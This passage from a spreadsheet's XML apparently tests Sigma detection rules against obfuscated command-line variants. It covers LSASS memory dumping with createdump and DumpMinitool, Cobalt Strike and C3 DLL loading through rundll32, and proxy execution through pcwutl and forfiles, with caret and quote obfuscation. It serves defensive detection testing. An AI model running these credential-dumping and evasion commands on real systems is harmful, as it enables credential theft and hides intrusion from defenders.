      <c r="E3819" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" "-u" "-f" C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F3819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3819" s="44" t="n"/>
      <c r="J3819" s="44" t="n"/>
      <c r="K3819" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3820" ht="15.75" customHeight="1" s="42">
      <c r="A3820" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3820" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C3820" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D3820" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E3820" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" --full --name C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F3820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3820" s="44" t="n"/>
      <c r="J3820" s="44" t="n"/>
      <c r="K3820" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3821" ht="15.75" customHeight="1" s="42">
      <c r="A3821" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3821" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C3821" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D3821" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E3821" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" -^u -^f C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp 788"</t>
        </is>
      </c>
      <c r="F3821" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3821" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump (515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J3821" s="44" t="n"/>
      <c r="K3821" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3822" ht="15.75" customHeight="1" s="42">
      <c r="A3822" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3822" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C3822" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D3822" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E3822" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" -u -f C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp"" 788</t>
        </is>
      </c>
      <c r="F3822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3822" s="44" t="n"/>
      <c r="J3822" s="44" t="n"/>
      <c r="K3822" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3823" ht="15.75" customHeight="1" s="42">
      <c r="A3823" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3823" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C3823" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D3823" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E3823" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe"	-u	-f	C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp	788</t>
        </is>
      </c>
      <c r="F3823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3823" s="44" t="n"/>
      <c r="J3823" s="44" t="n"/>
      <c r="K3823" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3824" ht="15.75" customHeight="1" s="42">
      <c r="A3824" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3824" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C3824" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D3824" s="44" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E3824" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool.exe	Full	788	C:\Temp\dump.dmp</t>
        </is>
      </c>
      <c r="F3824" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3824" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3824" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3824" s="44" t="n"/>
      <c r="J3824" s="44" t="n"/>
      <c r="K3824" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3825" ht="15.75" customHeight="1" s="42">
      <c r="A3825" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3825" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C3825" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D3825" s="44" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E3825" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool.exe "Full" 788 C:\Temp\dump.dmp</t>
        </is>
      </c>
      <c r="F3825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3825" s="44" t="n"/>
      <c r="J3825" s="44" t="n"/>
      <c r="K3825" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3826" ht="15.75" customHeight="1" s="42">
      <c r="A3826" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3826" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C3826" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D3826" s="44" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E3826" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c DumpMinitool.exe F^ull 788 C:\Temp\dump.dmp</t>
        </is>
      </c>
      <c r="F3826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3826" s="44" t="n"/>
      <c r="J3826" s="44" t="n"/>
      <c r="K3826" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3827" ht="15.75" customHeight="1" s="42">
      <c r="A3827" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3827" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lnk</t>
        </is>
      </c>
      <c r="C3827" s="44" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File</t>
        </is>
      </c>
      <c r="D3827" s="44" t="inlineStr">
        <is>
          <t>33339be3-148b-4e16-af56-ad16ec6c7e7b</t>
        </is>
      </c>
      <c r="E3827" s="44" t="inlineStr">
        <is>
          <t>findstr.exe TEST-HOST C:\Temp\test.lnk</t>
        </is>
      </c>
      <c r="F3827" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3827" s="44" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File (33339be3-148b-4e16-af56-ad16ec6c7e7b)</t>
        </is>
      </c>
      <c r="J3827" s="44" t="n"/>
      <c r="K3827" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3828" ht="15.75" customHeight="1" s="42">
      <c r="A3828" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3828" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lnk</t>
        </is>
      </c>
      <c r="C3828" s="44" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File</t>
        </is>
      </c>
      <c r="D3828" s="44" t="inlineStr">
        <is>
          <t>33339be3-148b-4e16-af56-ad16ec6c7e7b</t>
        </is>
      </c>
      <c r="E3828" s="44" t="inlineStr">
        <is>
          <t>findstr.exe TEST-HOST C:\Temp\test.lnk.lnk</t>
        </is>
      </c>
      <c r="F3828" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3828" s="44" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File (33339be3-148b-4e16-af56-ad16ec6c7e7b)</t>
        </is>
      </c>
      <c r="J3828" s="44" t="n"/>
      <c r="K3828" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3829" ht="15.75" customHeight="1" s="42">
      <c r="A3829" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3829" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_child_process_masquerading</t>
        </is>
      </c>
      <c r="C3829" s="44" t="inlineStr">
        <is>
          <t>Forfiles.EXE Child Process Masquerading</t>
        </is>
      </c>
      <c r="D3829" s="44" t="inlineStr">
        <is>
          <t>f53714ec-5077-420e-ad20-907ff9bb2958</t>
        </is>
      </c>
      <c r="E3829" s="44" t="inlineStr">
        <is>
          <t>forfiles.exe  /p C:\Windows /c "cmd.exe /c echo Hello"</t>
        </is>
      </c>
      <c r="F3829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3829" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3829" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution (9aa5106d-bce3-4b13-86df-3a20f1d5cf0b)</t>
        </is>
      </c>
      <c r="J3829" s="44" t="n"/>
      <c r="K3829" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3830" ht="15.75" customHeight="1" s="42">
      <c r="A3830" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3830" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_child_process_masquerading</t>
        </is>
      </c>
      <c r="C3830" s="44" t="inlineStr">
        <is>
          <t>Forfiles.EXE Child Process Masquerading</t>
        </is>
      </c>
      <c r="D3830" s="44" t="inlineStr">
        <is>
          <t>f53714ec-5077-420e-ad20-907ff9bb2958</t>
        </is>
      </c>
      <c r="E3830" s="44" t="inlineStr">
        <is>
          <t>forfiles.exe /c "cmd.exe ""/c echo """</t>
        </is>
      </c>
      <c r="F3830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3830" s="44" t="n"/>
      <c r="J3830" s="44" t="n"/>
      <c r="K3830" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3831" ht="15.75" customHeight="1" s="42">
      <c r="A3831" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3831" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mode_codepage_russian</t>
        </is>
      </c>
      <c r="C3831" s="44" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language</t>
        </is>
      </c>
      <c r="D3831" s="44" t="inlineStr">
        <is>
          <t>12fbff88-16b5-4b42-9754-cd001a789fb3</t>
        </is>
      </c>
      <c r="E3831" s="44" t="inlineStr">
        <is>
          <t>mode.com con cp select=1251</t>
        </is>
      </c>
      <c r="F3831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3831" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3831" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3831" s="44" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language (12fbff88-16b5-4b42-9754-cd001a789fb3)</t>
        </is>
      </c>
      <c r="J3831" s="44" t="n"/>
      <c r="K3831" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3832" ht="15.75" customHeight="1" s="42">
      <c r="A3832" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3832" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C3832" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D3832" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E3832" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\TrolleyExpress.exe	764</t>
        </is>
      </c>
      <c r="F3832" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3832" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3832" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3832" s="44" t="n"/>
      <c r="J3832" s="44" t="n"/>
      <c r="K3832" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3833" ht="15.75" customHeight="1" s="42">
      <c r="A3833" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3833" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C3833" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D3833" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E3833" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\TrolleyExpress.exe "764"</t>
        </is>
      </c>
      <c r="F3833" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3833" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3833" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3833" s="44" t="n"/>
      <c r="J3833" s="44" t="n"/>
      <c r="K3833" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3834" ht="15.75" customHeight="1" s="42">
      <c r="A3834" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3834" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C3834" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D3834" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E3834" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Temp\TrolleyExpress.exe 000764</t>
        </is>
      </c>
      <c r="F3834" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3834" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3834" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3834" s="44" t="n"/>
      <c r="J3834" s="44" t="n"/>
      <c r="K3834" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3835" ht="15.75" customHeight="1" s="42">
      <c r="A3835" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3835" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C3835" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D3835" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E3835" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\TrolleyExpress.exe  764</t>
        </is>
      </c>
      <c r="F3835" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3835" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3835" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3835" s="44" t="n"/>
      <c r="J3835" s="44" t="n"/>
      <c r="K3835" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3836" ht="15.75" customHeight="1" s="42">
      <c r="A3836" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3836" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C3836" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D3836" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E3836" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\TrolleyExpress.exe -ma	764</t>
        </is>
      </c>
      <c r="F3836" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3836" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3836" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3836" s="44" t="n"/>
      <c r="J3836" s="44" t="n"/>
      <c r="K3836" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3837" ht="15.75" customHeight="1" s="42">
      <c r="A3837" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3837" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_c3_rundll32_pattern</t>
        </is>
      </c>
      <c r="C3837" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32</t>
        </is>
      </c>
      <c r="D3837" s="44" t="inlineStr">
        <is>
          <t>b18c9d4c-fac9-4708-bd06-dd5bfacf200f</t>
        </is>
      </c>
      <c r="E3837" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\payload.dll,"StartNodeRelay"</t>
        </is>
      </c>
      <c r="F3837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3837" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3837" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3837" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f); HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J3837" s="44" t="n"/>
      <c r="K3837" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3838" ht="15.75" customHeight="1" s="42">
      <c r="A3838" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3838" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_c3_rundll32_pattern</t>
        </is>
      </c>
      <c r="C3838" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32</t>
        </is>
      </c>
      <c r="D3838" s="44" t="inlineStr">
        <is>
          <t>b18c9d4c-fac9-4708-bd06-dd5bfacf200f</t>
        </is>
      </c>
      <c r="E3838" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe C:\Temp\payload.dll,StartNode^Relay</t>
        </is>
      </c>
      <c r="F3838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3838" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3838" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3838" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J3838" s="44" t="n"/>
      <c r="K3838" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3839" ht="15.75" customHeight="1" s="42">
      <c r="A3839" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3839" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_c3_rundll32_pattern</t>
        </is>
      </c>
      <c r="C3839" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32</t>
        </is>
      </c>
      <c r="D3839" s="44" t="inlineStr">
        <is>
          <t>b18c9d4c-fac9-4708-bd06-dd5bfacf200f</t>
        </is>
      </c>
      <c r="E3839" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\payload.dll,   StartNodeRelay</t>
        </is>
      </c>
      <c r="F3839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3839" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3839" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3839" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f); HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J3839" s="44" t="n"/>
      <c r="K3839" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3840" ht="15.75" customHeight="1" s="42">
      <c r="A3840" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3840" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C3840" s="44" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D3840" s="44" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E3840" s="44" t="inlineStr">
        <is>
          <t>rundll32 2.dll, StartW</t>
        </is>
      </c>
      <c r="F3840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3840" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3840" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3840" s="44" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32 (ae9c6a7c-9521-42a6-915e-5aaa8689d529)</t>
        </is>
      </c>
      <c r="J3840" s="44" t="n"/>
      <c r="K3840" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3841" ht="15.75" customHeight="1" s="42">
      <c r="A3841" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3841" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C3841" s="44" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D3841" s="44" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E3841" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32 2.dll, Start^W</t>
        </is>
      </c>
      <c r="F3841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3841" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3841" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3841" s="44" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32 (ae9c6a7c-9521-42a6-915e-5aaa8689d529)</t>
        </is>
      </c>
      <c r="J3841" s="44" t="n"/>
      <c r="K3841" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3842" ht="15.75" customHeight="1" s="42">
      <c r="A3842" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3842" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwutl</t>
        </is>
      </c>
      <c r="C3842" s="44" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll</t>
        </is>
      </c>
      <c r="D3842" s="44" t="inlineStr">
        <is>
          <t>9386d78a-7207-4048-9c9f-a93a7c2d1c05</t>
        </is>
      </c>
      <c r="E3842" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe "pcwutl".dll,LaunchApplication C:\WINDOWS\System32\notepad.exe</t>
        </is>
      </c>
      <c r="F3842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3842" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3842" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3842" s="44" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll (9386d78a-7207-4048-9c9f-a93a7c2d1c05)</t>
        </is>
      </c>
      <c r="J3842" s="44" t="n"/>
      <c r="K3842" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3843" ht="15.75" customHeight="1" s="42">
      <c r="A3843" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3843" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwutl</t>
        </is>
      </c>
      <c r="C3843" s="44" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll</t>
        </is>
      </c>
      <c r="D3843" s="44" t="inlineStr">
        <is>
          <t>9386d78a-7207-4048-9c9f-a93a7c2d1c05</t>
        </is>
      </c>
      <c r="E3843" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe pcwutl.dll,L^aunchApplication C:\WINDOWS\System32\notepad.exe</t>
        </is>
      </c>
      <c r="F3843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3843" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3843" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3843" s="44" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll (9386d78a-7207-4048-9c9f-a93a7c2d1c05); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J3843" s="44" t="n"/>
      <c r="K3843" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3844" ht="15.75" customHeight="1" s="42">
      <c r="A3844" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3844" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwutl</t>
        </is>
      </c>
      <c r="C3844" s="44" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll</t>
        </is>
      </c>
      <c r="D3844" s="44" t="inlineStr">
        <is>
          <t>9386d78a-7207-4048-9c9f-a93a7c2d1c05</t>
        </is>
      </c>
      <c r="E3844" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe pcwutl,LaunchApplication C:\WINDOWS\System32\notepad.exe</t>
        </is>
      </c>
      <c r="F3844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3844" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3844" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3844" s="44" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll (9386d78a-7207-4048-9c9f-a93a7c2d1c05); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J3844" s="44" t="n"/>
      <c r="K3844" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3845" ht="15.75" customHeight="1" s="42">
      <c r="A3845" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3845" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C3845" s="44" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D3845" s="44" t="inlineStr">
        <is>
